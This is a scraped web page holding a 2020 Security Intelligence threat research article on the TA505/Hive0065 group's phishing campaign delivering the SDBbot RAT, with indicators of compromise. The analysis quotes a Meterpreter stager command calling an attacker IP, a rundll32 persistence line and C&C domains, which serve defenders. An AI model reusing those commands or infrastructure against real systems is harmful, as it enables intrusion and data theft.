data-menu="megamenu__threat" on="tap:megamenu__news.hide, megamenu__series.hide, megamenu__topics.hide, megamenu__industries.hide, megamenu__threat.show, megamenu__podcast.hide, megamenu__events.hide, megamenu__mask.show" role="link" tabindex="0">Threat Research</button> <button type="button" class="navigation__button " data-menu="megamenu__podcast" on="tap:megamenu__news.hide, megamenu__series.hide, megamenu__topics.hide, megamenu__industries.hide, megamenu__threat.hide, megamenu__podcast.show, megamenu__events.hide, megamenu__mask.show" role="link" tabindex="0">Podcast</button> <button type="button" aria-labelledby="search-tablet" class="navigation__search" onclick="document.getElementById('search__input').focus()" on="tap:search.toggleClass(class='megamenu__open')" role="link" tabindex="0"> <amp-img width="24" height="24" layout="responsive" src="https://securityintelligence.com/wp-content/themes/sapphire/images/search.svg" alt="Search"></amp-img> </button> </div>  <form id="search" class="search " method="GET" action="/" target="_top" tabindex="-1"> <amp-autocomplete filter="prefix" src="https://securityintelligence.com/wp-content/themes/sapphire/app/jsons/suggestions.json" suggest-first submit-on-enter on="select:search.submit" tabindex="-1"> <input id="search__input" tabindex="-1" type="text" name="s" autocomplete="on" placeholder="What would you like to search for?" aria-label="Search" oninput="validateInput(this)" required> </amp-autocomplete> <button tabindex="-1" value="submit" type="submit" class="search__submit" aria-label="Click to search"> <amp-img width="20" height="20" layout="responsive" src="https://securityintelligence.com/wp-content/themes/sapphire/images/search.svg" alt="Search"></amp-img> <span>Search</span> </button> <button tabindex="-1" value="reset" class="search__close" type="reset" aria-labelledby="search" on="tap:search.toggleClass(class='megamenu__open')" role="link"> <amp-img width="14" height="14" layout="responsive" src="https://securityintelligence.com/wp-content/themes/sapphire/images/close.svg" alt="Close"></amp-img> </button> </form>  <div id="navigation__mega">  <section id="megamenu__news" class="megamenu" data-menu="nav-news" on="tap:megamenu__news.show, megamenu__mask.show" role="link" tabindex="0"> <amp-list layout="responsive" width="1440" height="248" credentials="include" src="https://securityintelligence.com/wp-content/themes/sapphire/app/jsons/posts.php?quantity=4&type=ibm_news" binding="no"> <template type="amp-mustache"> <div class="row">  {{#articles}} <article class="megamenu__article"> <a href="{{permalink}}" class="megamenu__link"> <div class="megamenu__image"> <amp-img width="630" height="330" layout="responsive" src="{{image}}" alt="{{image_alt}}"></amp-img> </div> <h3 class="megamenu__title">{{title}}</h3> </a> </article> {{/articles}}  <a href="/news/" class="megamenu__more"> <amp-img width="24" height="24" layout="responsive" src="https://securityintelligence.com/wp-content/themes/sapphire/images/post-type-icons/news.svg" alt="News"></amp-img> <span>View All News</span> </a> </div> </template> </amp-list> </section>   <section id="megamenu__topics" class="megamenu" data-menu="nav-topics" on="tap: megamenu__topics.show, megamenu__mask.show" role="link" tabindex="0"> <div class="row">  <div class="megamenu__list"> <a href="/category/app-security/">Application Security</a> <a href="/category/artificial-intelligence/">Artificial Intelligence</a> <a href="/category/ciso-corner/">CISO</a> <a href="/category/cloud-protection/">Cloud Security</a> <a href="/category/data-protection/">Data Protection</a> <a href="/category/endpoint/">Endpoint</a> </div> <div class="megamenu__list"> <a href="/category/fraud-protection/">Fraud Protection</a> <a href="/category/identity-access/">Identity & Access</a> <a href="/category/incident-response/">Incident Response</a> <a href="/category/mainframe/">Mainframe</a> <a href="/category/network/">Network</a> <a href="/category/risk-management/">Risk Management</a> </div> <div class="megamenu__list"> <a href="/category/security-intelligence-analytics/">Intelligence & Analytics</a> <a href="/category/security-services/">Security Services</a> <a href="/category/threat-hunting/">Threat Hunting</a> <a href="/category/topics/zero-trust/">Zero Trust</a> <a href="/infographic-zero-trust-policy/">Infographic: Zero trust policy</a> </div> <div class="megamenu__list"> <span>Industries</span> <a href="/category/banking-financial-services-industry/">Banking & Finance</a> <a href="/category/energy-utility-industry/">Energy & Utility</a> <a href="/category/government/">Government</a> <a href="/category/health-care-industry/">Healthcare</a> </div>  <a href="/category/topics/" class="megamenu__more"> <amp-img width="24" height="24" layout="responsive" src="https://securityintelligence.com/wp-content/themes/sapphire/images/post-type-icons/topics.svg" alt="Topics"></amp-img> <span>View All Topics</span> </a> </div> </section>  <section id="megamenu__threat" class="megamenu" data-menu="nav-x-force" on="tap:megamenu__threat.show, megamenu__mask.show" role="link" tabindex="0"> <amp-list layout="responsive" width="1440" height="248" credentials="include" src="https://securityintelligence.com/wp-content/themes/sapphire/app/jsons/posts.php?quantity=4&category=x-force" binding="no"> <template type="amp-mustache"> <div class="row">  {{#articles}} <article class="megamenu__article"> <a href="{{permalink}}" class="megamenu__link"> <div class="megamenu__image"> <amp-img width="630" height="330" layout="responsive" src="{{image}}" alt="{{image_alt}}"></amp-img> </div> <h3 class="megamenu__title">{{title}}</h3> </a> </article> {{/articles}}  <a href="/x-force/" class="megamenu__more"> <amp-img width="24" height="24" layout="responsive" src="https://securityintelligence.com/wp-content/themes/sapphire/images/post-type-icons/threat-research.svg" alt="Threat Research"></amp-img> <span>View More From X-Force</span> </a> </div> </template> </amp-list> </section>  <section id="megamenu__podcast" class="megamenu" data-menu="nav-media" on="tap:megamenu__podcast.show, megamenu__mask.show" role="link" tabindex="0"> <amp-list layout="responsive" width="1440" height="248" credentials="include" src="https://securityintelligence.com/wp-content/themes/sapphire/app/jsons/posts.php?quantity=4&type=ibm_media" binding="no"> <template type="amp-mustache"> <div class="row">  {{#articles}} <article class="megamenu__article"> <a href="{{permalink}}" class="megamenu__link"> <div class="megamenu__image"> <amp-img width="630" height="330" layout="responsive" src="{{image}}" alt="{{image_alt}}"></amp-img> </div> <h3 class="megamenu__title">{{title}}</h3> </a> </article> {{/articles}}  <a href="/media/" class="megamenu__more"> <amp-img width="24" height="24" layout="responsive" src="https://securityintelligence.com/wp-content/themes/sapphire/images/post-type-icons/podcast.svg" alt="Podcast"></amp-img> <span>View All Episodes</span> </a> </div> </template> </amp-list> </section> </div>  <div id="megamenu__mask" class="navigation__mask " hidden></div>  <script type="text/javascript"> function validateInput(inputElement) { // Regular expression to allow only letters (both uppercase and lowercase) and numbers var regex = /^[A-Za-z0-9 ]*$/; // Get the current value of the input field var inputValue = inputElement.value; // Check if the input value matches the allowed pattern if (!regex.test(inputValue)) { // If the input contains special characters, remove them inputElement.value = inputValue.replace(/[^A-Za-z0-9 ]/g, ''); } } // DESKTOP MENU LINKS - HOVER ACTION var elementList = document.querySelectorAll('.navigation__menu .navigation__button'); for (i = 0; i < elementList.length; i++) { elementList[i].addEventListener('mouseenter', function() { if (localStorage['megamenu-status'] !== 'first-interaction') { var mega = document.getElementById("navigation__mega"); var menu_elements = document.getElementById(this.dataset.menu); var mask = document.getElementById("megamenu__mask"); menu_elements.click(); mega.classList.add('amp-open'); menu_elements.classList.add('amp-open'); mask.classList.add('amp-open'); } }); elementList[i].addEventListener('mouseleave', function() { if (localStorage['megamenu-status'] !== 'first-interaction') { var mega = document.getElementById("navigation__mega"); var menu_elements = document.getElementById(this.dataset.menu); var mask = document.getElementById("megamenu__mask"); mega.classList.remove('amp-open'); menu_elements.classList.remove('amp-open'); mask.classList.remove('amp-open'); } }); } // TABLET MENU LINKS - CLICK ACTION var elementList = document.querySelectorAll('.navigation__menu--tablet .navigation__button'); for (i = 0; i < elementList.length; i++) { elementList[i].addEventListener('click', function() { var mega = document.getElementById("navigation__mega"); var menu_elements = document.getElementById(this.dataset.menu); var mask = document.getElementById("megamenu__mask"); menu_elements.click(); mega.classList.add('amp-open'); menu_elements.classList.add('amp-open'); mask.classList.add('amp-open'); }); } // OPPENED MEGAMENU - HOVER ACTION var elementList = document.querySelectorAll('.megamenu'); for (i = 0; i < elementList.length; i++) { elementList[i].addEventListener('mouseenter', function() { var mega = document.getElementById("navigation__mega"); var nav_elements = document.getElementById(this.dataset.menu); var mask = document.getElementById("megamenu__mask"); this.classList.add('amp-open'); mega.classList.add('amp-open'); mask.classList.add('amp-open'); nav_elements.classList.add('amp-open'); }); elementList[i].addEventListener('mouseleave', function() { var mega = document.getElementById("navigation__mega"); var nav_elements = document.getElementById(this.dataset.menu); var mask = document.getElementById("megamenu__mask"); this.classList.remove('amp-open'); mega.classList.remove('amp-open'); mask.classList.remove('amp-open'); nav_elements.classList.remove('amp-open'); }); } </script>  <button type="button" aria-labelledby="search-tablet" class="search__mobile__icon" onclick="document.getElementById('search__input').focus()" on="tap:search.toggleClass(class='megamenu__open')" role="link" tabindex="0"> <amp-img width="18" height="18" layout="fixed" src="https://securityintelligence.com/wp-content/themes/sapphire/images/search.svg" alt="Search"></amp-img> </button> <div class="navigation__mobile-icon" on="tap:navigation__mobile.toggleVisibility, navigation__hamburguer.toggleVisibility, navigation__close.toggleVisibility " role="link" tabindex="0"> <amp-img id="navigation__hamburguer" width="24" height="24" layout="responsive" src="https://securityintelligence.com/wp-content/themes/sapphire/images/hamburguer.svg" alt="Menu"></amp-img> <amp-img id="navigation__close" width="24" height="24" layout="responsive" src="https://securityintelligence.com/wp-content/themes/sapphire/images/close.svg" alt="Close" hidden></amp-img> </div>  <section id="navigation__mobile" class="navigation__mobile-list" hidden> <div class="container"> <a href="/news/">News</a>  <amp-accordion disable-session-states>  <section class="navigation__accordion"> <h2>Topics</h2> <div class="navigation__accordion-content"> <div class="row"> <a href="/category/topics/">All Categories</a> <a href="/category/app-security/">Application Security</a> <a href="/category/identity-access/">Identity & Access</a> <a href="/category/artificial-intelligence/">Artificial Intelligence</a> <a href="/category/incident-response/">Incident Response</a> <a href="/category/ciso-corner/">CISO</a> <a href="/category/mainframe/">Mainframe</a> <a href="/category/cloud-protection/">Cloud Security</a> <a href="/category/mobile-security-podcasts/">Mobile Security</a> <a href="/category/data-protection/">Data Protection</a> <a href="/category/network/">Network</a> <a href="/category/endpoint/">Endpoint</a> <a href="/category/risk-management/">Risk Management</a> <a href="/category/fraud-protection/">Fraud Protection</a> <a href="/category/threat-hunting/">Threat Hunting</a> <a href="/category/security-services/">Security Services</a> <a href="/category/security-intelligence-analytics/">Security Intelligence & Analytics</a> </div> <div class="row"> <span>Industries</span> <a href="/category/industries/banking-financial-services-industry/">Banking & Finance</a> <a href="/category/energy-utility-industry/">Energy & Utility</a> <a href="/category/government/">Government</a> <a href="/category/health-care-industry/">Healthcare</a> </div> </div> </section> </amp-accordion> <a href="/x-force/">X-Force</a> <a href="/media/">Podcast</a> </section> </div> </div> </nav>  <div class="scroll-to-top ">  <div id="top-viewer" class="scroll-to-top__viewer"></div>  <div class="sticky" style="height: 100%;"> <button id="scrollToTopButton" on="tap:top-viewer.scrollTo(duration=200, position=bottom)" class="tap_target "> <div class="scroll-to-top__button"> <amp-img width="12" height="16" layout="fixed" alt="Back-to-top" src="https://securityintelligence.com/wp-content/themes/sapphire/images/scroll-to-top.svg"></amp-img> </div> </button> </div>  <amp-animation id="showAnim" layout="nodisplay"> <script type="application/json"> { "duration": "200ms", "fill": "both", "iterations": "1", "direction": "alternate", "animations": [{ "selector": "#scrollToTopButton", "keyframes": [{ "opacity": "1", "visibility": "visible" }] }] } </script> </amp-animation> <amp-animation id="hideAnim" layout="nodisplay"> <script type="application/json"> { "duration": "200ms", "fill": "both", "iterations": "1", "direction": "alternate", "animations": [{ "selector": "#scrollToTopButton", "keyframes": [{ "opacity": "0", "visibility": "hidden" }] }] } </script> </amp-animation> </div>  <amp-position-observer target="top-viewer" intersection-ratios="0" on="enter:hideAnim.start; exit:showAnim.start" layout="nodisplay"></amp-position-observer>  <script id="post-schema" type="application/ld+json"> { "@context": "http://schema.org", "@type": "Article", "headline": "TA505 Continues to Infect Networks With SDBbot RAT", "mainEntityOfPage": "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/", "author": { "@type": "Person", "name": "Melissa Frydrych" }, "datePublished": "2020-04-14T06:00:27-04:00", "dateModified": "2021-02-02T09:55:09-05:00", "publisher": { "@type": "Organization", "name": "Security Intelligence", "logo":{ "@type": "ImageObject", "url": "https://securityintelligence.com/wp-content/themes/security-intelligence/assets/img/logo.png" } }, "image": [ "https://securityintelligence.com/wp-content/uploads/2020/04/ta505-continues-to-infect-networks-with-sdbbot-rat-630x330.jpg" ], "articleBody": "<a href="https://www.ibm.com/security/services/ibm-x-force-incident-response-and-intelligence" target="_blank" rel="noopener noreferrer">IBM X-Force Incident Response and Intelligence Services (IRIS)</a> responds to security incidents around the globe. During analysis and comparison of malicious activity on enterprise networks, our team identified attacks likely linked to Hive0065, also known as TA505. We observed that Hive0065 continues to spread the SDBbot remote-access Trojan (RAT) alongside other custom malware and continues to display tactics used against companies within the past year. Attacks that deploy malware and RATs on targeted networks are a way for cybercrime groups to compromise networks and open channels for further activity, which could be immediate, or take place at a later stage. RATs are a common tool in targeted attacks as they enable a vast array of remote actions for the attacker. Those include deploying additional malware, spying on users and carrying out actions from the infected device or server where they are installed. Hive0065 is a financially motivated cybercrime group that has been actively targeting various industries, including finance, retail and restaurants, since at least 2014. This group primarily conducts malicious spam campaigns delivering a wide range of custom and open-source malware. The most notorious among these are campaigns involving banking Trojans such as Dridex and <a href="https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/" target="_blank" rel="noopener noreferrer">TrickBot</a>, ransomware such as Clop/<a href="https://securityintelligence.com/news/new-dll-cryptomix-ransomware-reportedly-using-remote-desktop-services-for-installation/" target="_blank" rel="noopener noreferrer">Cryptomix</a> and MINEBRIDGE, and extortion schemes demanding payment in bitcoin. <h2>SDBbot and Familiar TTPs</h2> In November 2019, X-Force IRIS observed a threat actor targeting enterprise employees in Europe with a spear phishing email impersonating Onehub<a title="" href="#_ftn1" target="_blank" rel="noopener noreferrer" name="_ftnref1"></a>, a legitimate, cloud-based file-sharing application for businesses. The email was designed to extract Active Directory (AD) discovery data and user credentials and to infect the environment with the SDBbot RAT. Based on our investigation and analysis of the actor's tactics, techniques and procedures (TTPs), their command-and-control (C&C) infrastructure and the use of specific malware previously attributed to the group, X-Force IRIS suspects it is highly likely that Hive0065 was behind the attacks. SDBbot RAT has been <a href="https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader" target="_blank" rel="noopener noreferrer">observed in Hive0065 attacks</a> since at least September 2019 and has been used primarily as a secondary payload. This malware features remote-access capabilities, accepts commands from a C&C server such as video recording, and has the ability to exfiltrate data from the victimized devices and networks. In a variety of campaigns attributed to this group previously reported by <a href="https://www.proofpoint.com/us/threat-insight/post/ta505-and-others-launch-new-coronavirus-campaigns-now-largest-collection-attack" target="_blank" rel="noopener noreferrer">Proofpoint</a> and <a href="https://www.zerofox.com/blog/ta505-halloween-malware/" target="_blank" rel="noopener noreferrer">ZeroFOX</a>, Hive0065 was observed to be conducting phishing campaigns that delivered malicious Excel (.XLS) files hosted on domains spoofed to appear as the cloud storage sites Sync and Dropbox. The campaigns also featured C&C infrastructure that spoofs other legitimate services, like Google Drive and Microsoft Office. More recent Hive0065 <a href="https://www.proofpoint.com/us/threat-insight/post/ta505-and-others-launch-new-coronavirus-campaigns-now-largest-collection-attack" target="_blank" rel="noopener noreferrer">campaigns</a> reported in March 2020 exploited the current interest in the COVID-19 pandemic, using Coronavirus-themed phishing emails to deliver the Locky ransomware and the Dridex banking Trojan. In some campaigns, Hive0065 targeted healthcare organizations with emails purporting to come from medical research groups and offering supposed Coronavirus remedies in exchange for bitcoin payments. The TTPs used in these campaigns align with those of Hive0065/TA505, specifically the spoofing of cloud storage websites to distribute malware files. <h2 class="">Continued Malicious Activity</h2> Research conducted during X-Force IRIS investigations found continued malicious activity from Hive0065 that infected company networks with malware and the SDBbot RAT. The TTPs that we found are consistent with previous activity attributed to Hive0065: <ul> <li class="">Spear phishing to deliver malware</li> <li class="">Macro-enabled documents</li> <li class="">The use of droppers containing embedded dynamic-link libraries (DLLs)</li> <li class="">The use of an installer component</li> <li class="">The use of legitimate cloud hosting services for malware distribution</li> <li class="">Spoofing legitimate services like Microsoft and Google</li> <li>C&C domains similar in naming convention and structure (sample of domain names shown below)</li> </ul> <table style="width: 100%;" border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <td style="font-size: 12px;" valign="top"><strong>Domains reported by X-Force</strong></td> <td style="font-size: 12px;" valign="top"><strong>Domains reported by Proofpoint</strong></td> <td style="font-size: 12px;" valign="top"><strong>Domains reported by ZeroFOX</strong></td> </tr> <tr> <td style="font-size: 12px;" valign="top">drm-server-booking[.]com</td> <td style="font-size: 12px;" valign="top">news-server-drm-google[.com</td> <td style="font-size: 12px;" valign="top">office-en-service[.]com</td> </tr> <tr> <td style="font-size: 12px;" valign="top">microsoft-live-us[.]com</td> <td style="font-size: 12px;" valign="top">update365-office-ens[.]com</td> <td style="font-size: 12px;" valign="top">googledrive-download[.]com</td> </tr> <tr> <td style="font-size: 12px;" valign="top">dl1.sync-share[.]com</td> <td style="font-size: 12px;" valign="top">office365-update-en[.]com</td> <td style="font-size: 12px;" valign="top">d1.syncdownloading[.]com</td> </tr> </tbody> </table> <h2 class="">Compromise Summary</h2> In order to gain access to victim environments, Hive0065 sends a malicious email to employees purporting to be from an HR representative's account. The email body impersonated Onehub, inviting the recipient to download a malicious document named <em>Resume.doc</em>. <img style="margin: 8px auto;" title="spear phish email to employee" src="https://securityintelligence.com/wp-content/uploads/2020/04/onehub.png" alt="Email Body Including Onehub" width="411" height="361" /> The employee receiving this email downloaded and opened the document, which contained malicious code. Once the code was executed, a persistence mechanism was installed and a malicious password harvester was executed. In this instance, once the malicious code was executed, it dropped a malicious binary (DLL) similar to CobaltStrike, which subsequently created and executed additional files. The actor used the initially compromised system to escalate privileges and move laterally across additional systems on the network. <h2 class="">Hive0065's Arsenal of Tools</h2> <h4 class="">VSPUB DLLs With CobaltStrike Code Similarities</h4> The malicious email delivering the file named <em>Resume.doc</em> initially led the recipient to a malicious domain. After several redirections, the final redirect pointed to the malicious URL <em>hxxps://dl1.sync-share[.]com?Or2at</em>. In addition, we also observed employees who opened the document browsed to <em>hxxps://dl1.sync-share[.]com</em> and downloaded <em>Resume (1).doc</em> and a second file, <em>Resume (3).doc</em>. Seconds later, a suspicious document named <em>main_template.docx</em> was created. Every time <em>main_template.docx</em> was opened, VBA macros were executed and a fake Microsoft Office login window (<em>FakeL.exe</em>) was displayed to the user while a malicious payload executed in the background. If the password entered was correct, the display disappeared. Password attempts were written into a file named <em>Password.txt</em>, which was subsequently deleted. <hr align="left" size="1" width="33%" /> <img style="margin: 8px auto;" title="fake windows login" src="https://securityintelligence.com/wp-content/uploads/2020/04/fake-windows-login.png" alt="Fake Login Display" width="450" height="103" /> The document may also display the fake message "This document is protected" to entice users to enable content and execute malicious code. The .docx file contained embedded x86 and x64 versions of the payload DLL so that the appropriate version was dropped depending on the target operating system. The DLLs were dropped to the following locations: <ul> <li class="left" style="text-align: left;">x86: %APPDATA%\Microsoft\Windows\Template\vspub1.dll</li> <li class="left" style="text-align: left;">x64: %APPDATA%\Microsoft\Windows\Template\vspub2.dll</li> </ul> The DLLs were loaded to the memory space of <em>winword.exe</em> using LoadLibraryW API, and the DLL module was compressed twice to hide actual code. It used a custom packer that unpacks to UPX, an open-source executable packer, which revealed the actual code. <img class="alignnone size-full wp-image-418038" src="https://securityintelligence.com/wp-content/uploads/2020/04/si-img-customPacker.jpg" alt="Image of a compressed module" width="800" height="73" /> While these DLLs did not match existing, known code families, a code comparison showed that this code has similarities with the <a href="https://attack.mitre.org/software/S0154/" target="_blank" rel="noopener noreferrer">CobaltStrike</a> framework. The VSPUB DLLs gather system information and use HTTP POST requests to send it to the C&C domain <em>microsoft-live-us[.]com/fidonet</em> or the IP address 185[.]176[.]221[.]45. Code suggests that upon successful reply from the server, the DLL can download and execute additional files. To note, <em>microsoft-live-us[.]com</em> was registered just days before the attack took place, along with the domain <em>sync-share[.]com</em>, to include subdomains <em>dl1.sync-share[.]com</em>,<em> dl2.sync-share[.]com </em>and <em>dl3.sync-share[.]com</em>. <em>Sync-share[.]com</em> is likely attacker-owned infrastructure, and although the dl2 and dl3 subdomains were not observed in this particular activity, it is likely that these domains will be used in a similar fashion. <h4 class="">Meterpreter Reverse Shell</h4> After the initial system was compromised, the actors proceeded to compromise additional systems on the network by executing malicious PowerShell services running as the local SYSTEM, as well as the installation of bind shells. A Meterpreter reverser shell was used in order to remotely control compromised systems within the internal network; it was installed as a service using the execution of an encoded PowerShell script. The malicious PowerShell command decodes into a reverse shell connecting back to two malicious IP addresses: <ul> <li class="">91[.]214[.]124[.]20</li> <li class="">91[.]214[.]124[.]25</li> </ul> While most samples we found during our investigations were Meterpreter reverse shells connecting back to a C&C IP address, Meterpreter bind-shells that listen for incoming connections were also discovered. We found that a domain admin account was compromised and the Active Directory audit tool PingCastle was run. Using the domain admin, the actor was able to compromise several other accounts and execute malicious services and persistence mechanisms, namely SDBbot RAT Loaders. <h4 class="">TinyMet Meterpreter Stager</h4> The investigation led our team to the discovery of a file named <em>wsus.exe</em> (a version of TinyMet, a tiny, flexible Meterpreter stager), along with three additional files that were created and executed on the first compromised system. During the investigation, TinyMet was observed being executed with the command <em>c:\intel\wsus.exe 1 91.214.124[.]20 43434</em>, indicating a reverse HTTP connection, and connected to a malicious IP address by either renaming a binary or providing specific arguments. The commands executed were used for discovery purposes, listing members of privileged groups and network information. <h2 class="">SDBbot RAT</h2> <h4 class="">SDBbot RAT Installer</h4> X-Force IRIS found that the SDBbot RAT installers are x64-packed and decrypt parts of SDBbot's code and strings upon execution. In addition, they read a binary blob located within the registry <em>HKLM\\MACHINE\\SOFTWARE\\Microsoft\\[3 characters]\[1 character]</em>. Depending on user privileges, a binary blog is located in the registry value. If regular user privileges are running, the installer component will establish persistence using the registry <em>Run</em> and execute ordinal #1 of the DLL: <p class="" align="center"><em>rundll32 "C:\Users\[USER]\AppData\Roaming\xrjkrobuy.dll",#1</em></p> <h4 class="">SDBbot RAT Loader</h4> As part of the investigation, X-Force IRIS found that the SDBbot RAT loader we analyzed was similar in nature to the version analyzed by <a href="https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader" target="_blank" rel="noopener noreferrer">Proofpoint</a>, which was defined as the "Loader Component" of SDBbot in Hive0065 campaigns from October 2019. The loader component will read the binary blob and execute the contained shellcode. Once the shellcode executes, it decompresses and executes the SDBbot payload. The shellcode will check to see if it was executed earlier than the loader DLL files and if found to be "TRUE," the process is terminated. <h4 class="">SDBbot RAT Payload</h4> Once the attackers established a foothold on the network, four new registry keys on the local Software hive were created and SDBbot RAT loader DLL files were installed as persistence mechanisms; the loaders were injected into the process <em>winlogon.exe</em> every time the process was executed. Upon execution, SDBbot RAT checks for the presence of the mutex<em> windows_7_windows_10_check_running_once_mutex</em> and proceeds to retrieve a C&C address from the file <em>C:\ip.txt</em>. If that file is not available, it will use the C&C <em>drm-server-booking[.]com</em> as the default server. SDBbot RAT will subsequently gather system information and communicate back to the C&C server by sending and receiving a DWORD: 0xC0DE0000. The C&C will send additional arguments depending on the command. <h2>Conclusion</h2> Hive0065 has been active since at least 2014, adjusting its TTPs, targeting and infrastructure with each campaign. A relatively recent addition to Hive0065's toolkit, SDBbot, is being used in attacks primarily as a second-stage malware, composed of an installer, a loader and RAT components. SDBbot has the ability to perform typical RAT functions, such as communicating with C&Cs, receiving commands and obtaining system information. On infected systems, this malware could grant attackers extensive ability to drop and execute additional malicious payloads, control infected systems and perform actions the legitimate user would have access to. Remote-access Trojans are one of the most prevalent tools in targeted attacks as they facilitate that type of control for remote attackers. As X-Force IRIS continues to track Hive0065, we expect to see this group continue to target a wide range of industries using social engineering to deliver open-source and custom malware while constantly adjusting TTPs and C&C infrastructure to evade detection. <h2>Indicators of Compromise (IoCs)</h2> <p class=""><strong>C&C IP Addresses</strong></p> <ul> <li class="">91[.]214[.]124[.]25</li> <li class="">91[.]214[.]124[.]20</li> <li class="">185[.]176[.]221[.]45</li> </ul> <p class=""><strong>C&C Domains</strong></p> <ul> <li class="">drm-server-booking[.]com</li> <li class="">microsoft-live-us[.]com</li> <li class="">dl1.sync-share[.]com</li> </ul> <p class=""><strong>URL Redirections</strong></p> <ul> <li class="">https://eur01.safelinks.protection.outlook[.]com/?url=https://clck.ru/JnFFT&data=02|01||bed42450519b40df4d8808d762bd4ff1|d847080b33824b27886012fe4d8edb27|1|0|637086437565223782&sdata=0VDHXIfGUjxrbDC0fnF/VcgoQIGSAD/PBCYcwFodSH4=&reserved=0</li> <li class="">https://clck[.]ru/JnFFT</li> <li class="">https://sba.yandex[.]net/redirect?url=https%3A%2F%2Fdl1.sync-</li> <li>share.com%3FOr2at&client=clck&sign=2a3f3d25a38344769c6cfb6705a0f918'</li> </ul> <p class=""><strong>Final Redirection Hosting Malicious Document</strong></p> <ul> <li class="">https://dl1.sync-share[.]com?Or2at</li> </ul> <p class=""><strong>Files</strong></p> <table style="width: 100%; font-size: 12px;" border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <td valign="top"><strong>File name</strong></td> <td valign="top"><strong>SHA1</strong></td> <td valign="top"><strong>Description</strong></td> </tr> <tr> <td valign="top">main_template.docx</td> <td valign="top">33094acd614825a916b77df6c5141c088fc3768b</td> <td valign="top">Malicious document</td> </tr> <tr> <td valign="top">vspub1.dll</td> <td valign="top">bf0f7abda2228059bb00ec9658ee447fbe84d277</td> <td valign="top">CobaltStrike similarities</td> </tr> <tr> <td valign="top">vspub2.dll</td> <td valign="top">d40510da42a478d72e649993208710668a7f6c27</td> <td valign="top">CobaltStrike similarities</td> </tr> <tr> <td valign="top">xrjkrobuy.dll</td> <td valign="top">14f52ae68344e1643b3066c10f7044fdd819db4e</td> <td valign="top">SDBot RAT</td> </tr> <tr> <td valign="top">upywloeza.dll</td> <td valign="top">0cc7cca16afd632857e3883c06b2f55c057b563e</td> <td valign="top">SDBot RAT</td> </tr> <tr> <td valign="top">dtzvlbtxn.dll</td> <td valign="top">d36e983886a084887f887c6d562d3bc0664587c4</td> <td valign="top">SDBot RAT</td> </tr> <tr> <td valign="top">lvgoywrnxwy.dll</td> <td valign="top">fea7d944e317c7b2ef1aba57600a8c5310368085</td> <td valign="top">SDBot RAT</td> </tr> <tr> <td valign="top">qcuqqgxmy.dll</td> <td valign="top">35423e04e58ab1f2267e19c47e1c69ea5b7041cc</td> <td valign="top">SDBot RAT</td> </tr> <tr> <td valign="top">pdxqzmftr.dll</td> <td valign="top">fd9620c0c295caaee3096423532bb1dbfb7064c5</td> <td valign="top">SDBot RAT</td> </tr> <tr> <td valign="top">lowpro3.13.exe</td> <td valign="top">cb0b39534d99057b02b090c3650fb1de43d19a02</td> <td valign="top">Binary</td> </tr> <tr> <td valign="top">wsus.exe</td> <td valign="top">caff1d315a5d87014e5fa62346f58407755d971e</td> <td valign="top">Meterpreter stager</td> </tr> <tr> <td valign="top">FakeL.exe</td> <td valign="top">45c43ec18d15ba7850e6ad2e2e54671636f4d926</td> <td valign="top">Password Stealer</td> </tr> </tbody> </table>" } </script>  <script id="post-schema" type="application/ld+json"> { "@context": "https://schema.org", "@type": "BreadcrumbList", "itemListElement": [ { "@type": "ListItem", "position": 1, "name": "Home", "item": "https://securityintelligence.com/" }, ] } </script> <div id="progressbar"> <amp-animation id="progress-animation" layout="nodisplay"> <script type="application/json"> { "duration": "1s", "iterations": "1", "fill": "both", "direction": "alternate", "animations": [{ "selector": "#progressbar", "keyframes": [{ "transform": "translateX(0)" }] }] } </script> </amp-animation> </div> <amp-position-observer target="post__content" intersection-ratios="0" viewport-margins="25vh 75vh" on="scroll:progress-animation.seekTo(percent=event.percent)" layout="nodisplay"></amp-position-observer> <div class="dark_background" style="background:black;"></div> <div class="container grid" style="background:black;">  <aside class="breadcrumbs "> <h1 class="breadcrumbs__page_title">TA505 Continues to Infect Networks With SDBbot RAT</h1> </aside> </div> <div class="container grid hero_background "> <div class="grid__content post "> <div class="post__thumbnail"> <amp-img alt="A security analyst conducts research on Hive0065's SDBbot RAT" width="1200" height="630" layout="responsive" src="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2020/04/ta505-continues-to-infect-networks-with-sdbbot-rat-630x330.jpg.webp" srcset="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2020/04/ta505-continues-to-infect-networks-with-sdbbot-rat-300x158.jpg.webp 300w, /wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2020/04/ta505-continues-to-infect-networks-with-sdbbot-rat-630x330.jpg.webp 630w, /wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2020/04/ta505-continues-to-infect-networks-with-sdbbot-rat.jpg.webp 1200w, /wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2020/04/ta505-continues-to-infect-networks-with-sdbbot-rat.jpg.webp 2400w"> <amp-img fallback alt="A security analyst conducts research on Hive0065's SDBbot RAT" width="1200" height="630" layout="responsive" src="https://securityintelligence.com/wp-content/uploads/2020/04/ta505-continues-to-infect-networks-with-sdbbot-rat-630x330.jpg" srcset="https://securityintelligence.com/wp-content/uploads/2020/04/ta505-continues-to-infect-networks-with-sdbbot-rat-300x158.jpg 300w, https://securityintelligence.com/wp-content/uploads/2020/04/ta505-continues-to-infect-networks-with-sdbbot-rat-630x330.jpg 630w, https://securityintelligence.com/wp-content/uploads/2020/04/ta505-continues-to-infect-networks-with-sdbbot-rat.jpg 1200w, https://securityintelligence.com/wp-content/uploads/2020/04/ta505-continues-to-infect-networks-with-sdbbot-rat.jpg 2400w"> </amp-img> </amp-img> </div> <div class="new_categoy"> <div class="category-container"> <div class="category"> <div class="theme"> <div class="form-check form-switch"> <div class="link-container"> <a href="#" class="theme-link" id="light-theme-link">Light</a> <a href="#" class="theme-link" id="dark-theme-link">Dark</a> </div> </div> </div> <hr class="separator"> <div class="author_date"> <div class="information"> <span class="date">April 14, 2020</span> <span class="author_category">By <a href="https://securityintelligence.com/author/melissa-frydrych/" >Melissa Frydrych</a> </span> <span class="author_category"><span 